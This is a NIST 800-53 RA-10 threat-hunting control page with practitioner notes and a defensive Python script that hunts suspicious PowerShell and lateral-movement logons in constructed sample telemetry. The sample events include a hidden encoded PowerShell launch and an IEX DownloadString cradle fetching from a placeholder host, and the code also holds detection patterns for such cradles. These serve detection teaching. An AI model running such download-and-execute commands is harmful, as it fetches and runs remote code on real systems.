NIST 800-53 REV 5 • RISK ASSESSMENT

RA-10 Threat Hunting

Establish and maintain a cyber threat hunting capability to:

a. Search for indicators of compromise in organizational systems;
b. Detect, track, and disrupt threats that evade existing controls; and
c. Employ the threat hunting capability {{ insert: param, ra-10_odp }}.

CMMC Practice Mapping

No direct CMMC mapping

NIST 800-171 Mapping

No direct NIST 800-171 mapping

Related Controls

Supplemental Guidance

Threat hunting is an active means of cyber defense in contrast to traditional protection measures, such as firewalls, intrusion detection and prevention systems, quarantining malicious code in sandboxes, and Security Information and Event Management technologies and systems. Cyber threat hunting involves proactively searching organizational systems, networks, and infrastructure for advanced threats. The objective is to track and disrupt cyber adversaries as early as possible in the attack sequence and to measurably improve the speed and accuracy of organizational responses. Indications of compromise include unusual network traffic, unusual file changes, and the presence of malicious code. Threat hunting teams leverage existing threat intelligence and may create new threat intelligence, which is shared with peer organizations, Information Sharing and Analysis Organizations (ISAO), Information Sharing and Analysis Centers (ISAC), and relevant government departments and agencies.

Practitioner Notes

Threat hunting is the proactive search for adversaries already inside your network who have evaded your automated defenses. Instead of waiting for alerts, hunters actively look for signs of compromise.

Example 1: Schedule monthly threat hunting exercises where your security team develops hypotheses based on recent threat intelligence (e.g., 'APT group X uses PowerShell for lateral movement — let us look for unusual PowerShell activity on our servers') and searches your log data for evidence.

Example 2: In Microsoft Sentinel, use the Hunting workspace and built-in hunting queries aligned to MITRE ATT&CK techniques. Run queries for living-off-the-land techniques, unusual authentication patterns, and data staging. Document each hunt with the hypothesis, data sources searched, findings, and recommended actions.
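The two practitioner examples above describe hypothesis-driven hunts (unusual PowerShell activity, unusual authentication patterns) and the documentation each hunt should produce. The script below is an added illustration of that workflow in Python; it is not NIST text and not a Microsoft Sentinel query. The process-creation and logon events are constructed to resemble Windows 4688/4624 telemetry, the thresholds (10-minute window, three distinct hosts) are assumptions a hunter would tune to their environment, and the MITRE ATT&CK technique IDs are used only as labels in the hunt record.

```python
"""Hypothesis-driven threat hunt over constructed endpoint telemetry.

Added example, not part of NIST SP 800-53 or any vendor content. It runs
two hunts from the Practitioner Notes (suspicious PowerShell, an account
fanning out to many hosts) and documents each hunt as a record with
hypothesis, data sources, findings and recommended actions.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# --- Constructed sample telemetry (not real data) ------------------------
PROCESS_EVENTS = [  # resembles Windows 4688 / Sysmon Event ID 1
    {"ts": "2024-05-01T09:00:01", "host": "srv-web-01", "user": "svc_web",
     "parent": "w3wp.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"ts": "2024-05-01T09:12:44", "host": "ws-fin-07", "user": "jdoe",
     "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"},
    {"ts": "2024-05-01T09:20:00", "host": "srv-db-02", "user": "admin_jdoe",
     "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"ts": "2024-05-01T09:21:00", "host": "srv-db-02", "user": "SYSTEM",
     "parent": "services.exe", "image": "svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"ts": "2024-05-01T09:25:00", "host": "ws-it-03", "user": "helpdesk",
     "parent": "cmd.exe", "image": "powershell.exe", "cmdline": "powershell.exe Get-Service"},
]

LOGON_EVENTS = [  # resembles Windows 4624; logon_type 3 = network logon
    {"ts": "2024-05-01T10:00:00", "account": "svc_backup", "host": "srv-db-02", "logon_type": 3},
    {"ts": "2024-05-01T10:01:30", "account": "svc_backup", "host": "srv-web-01", "logon_type": 3},
    {"ts": "2024-05-01T10:02:10", "account": "svc_backup", "host": "ws-fin-07", "logon_type": 3},
    {"ts": "2024-05-01T10:03:00", "account": "svc_backup", "host": "srv-file-04", "logon_type": 3},
    {"ts": "2024-05-01T10:30:00", "account": "jdoe", "host": "ws-fin-07", "logon_type": 2},
    {"ts": "2024-05-01T10:31:00", "account": "jdoe", "host": "srv-file-04", "logon_type": 3},
    {"ts": "2024-05-01T11:00:00", "account": "jdoe", "host": "srv-web-01", "logon_type": 3},
]

# Hunt 1 indicators: -e/-enc/-EncodedCommand followed by a base64 blob,
# common download-and-execute cradles, and parents that rarely spawn a shell.
ENCODED_CMD = re.compile(r"(?i)\s-e(c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}")
DOWNLOAD_CRADLE = re.compile(r"(?i)\b(IEX|Invoke-Expression|DownloadString|DownloadFile|FromBase64String)\b")
UNUSUAL_PARENTS = {"w3wp.exe", "winword.exe", "excel.exe", "outlook.exe", "mshta.exe"}


def hunt_suspicious_powershell(events):
    """Return PowerShell launches that match one or more hunt indicators."""
    findings = []
    for ev in events:
        if ev["image"].lower() not in ("powershell.exe", "pwsh.exe"):
            continue
        reasons = []
        if ENCODED_CMD.search(ev["cmdline"]):
            reasons.append("encoded command")
        if DOWNLOAD_CRADLE.search(ev["cmdline"]):
            reasons.append("download/execution cradle")
        if ev["parent"].lower() in UNUSUAL_PARENTS:
            reasons.append(f"unusual parent {ev['parent']}")
        if reasons:
            findings.append({"ts": ev["ts"], "host": ev["host"], "user": ev["user"], "reasons": reasons})
    return findings


def hunt_fan_out_logons(events, window=timedelta(minutes=10), min_hosts=3):
    """Return accounts with network logons to >= min_hosts distinct hosts
    inside any sliding window of the given length (assumed thresholds)."""
    by_account = defaultdict(list)
    for ev in events:
        if ev["logon_type"] == 3:
            by_account[ev["account"]].append((datetime.fromisoformat(ev["ts"]), ev["host"]))
    findings = {}
    for account, logons in by_account.items():
        logons.sort()
        recent = []
        for ts, host in logons:
            recent.append((ts, host))
            recent = [(t, h) for t, h in recent if ts - t <= window]  # keep only the window
            hosts = {h for _, h in recent}
            if len(hosts) >= min_hosts:
                f = findings.setdefault(account, {"account": account, "hosts": set(),
                                                   "first_seen": recent[0][0].isoformat()})
                f["hosts"] |= hosts
                f["last_seen"] = ts.isoformat()
    return [dict(f, hosts=sorted(f["hosts"])) for f in findings.values()]


def build_hunt_record(hypothesis, technique, data_sources, findings, actions):
    """Document a hunt: hypothesis, data sources searched, findings, actions."""
    return {
        "hypothesis": hypothesis,
        "attack_technique": technique,
        "data_sources": data_sources,
        "findings": findings,
        "status": "evidence found" if findings else "no evidence in scope",
        "recommended_actions": actions if findings else ["record negative result; revisit when intel changes"],
    }


def run_hunts():
    """Run both hunts and return their documentation records."""
    powershell = build_hunt_record(
        "Adversaries run obfuscated PowerShell or spawn it from web/office processes",
        "T1059.001", ["process creation (4688 / Sysmon 1)"],
        hunt_suspicious_powershell(PROCESS_EVENTS),
        ["isolate affected hosts", "decode and review command lines", "check parent process integrity"])
    lateral = build_hunt_record(
        "One account fans out to many hosts via network logons in a short window",
        "T1021", ["security logon events (4624, logon type 3)"],
        hunt_fan_out_logons(LOGON_EVENTS),
        ["confirm the account's expected scope", "reset credentials if the activity is unexpected"])
    return {"powershell": powershell, "lateral_movement": lateral}


if __name__ == "__main__":
    import json
    print(json.dumps(run_hunts(), indent=2))
```

Each hunt is deliberately narrow and records a negative result as well as a positive one, which is what makes monthly hunts comparable over time; in a real environment the same two functions would be pointed at exported SIEM results rather than the embedded sample events.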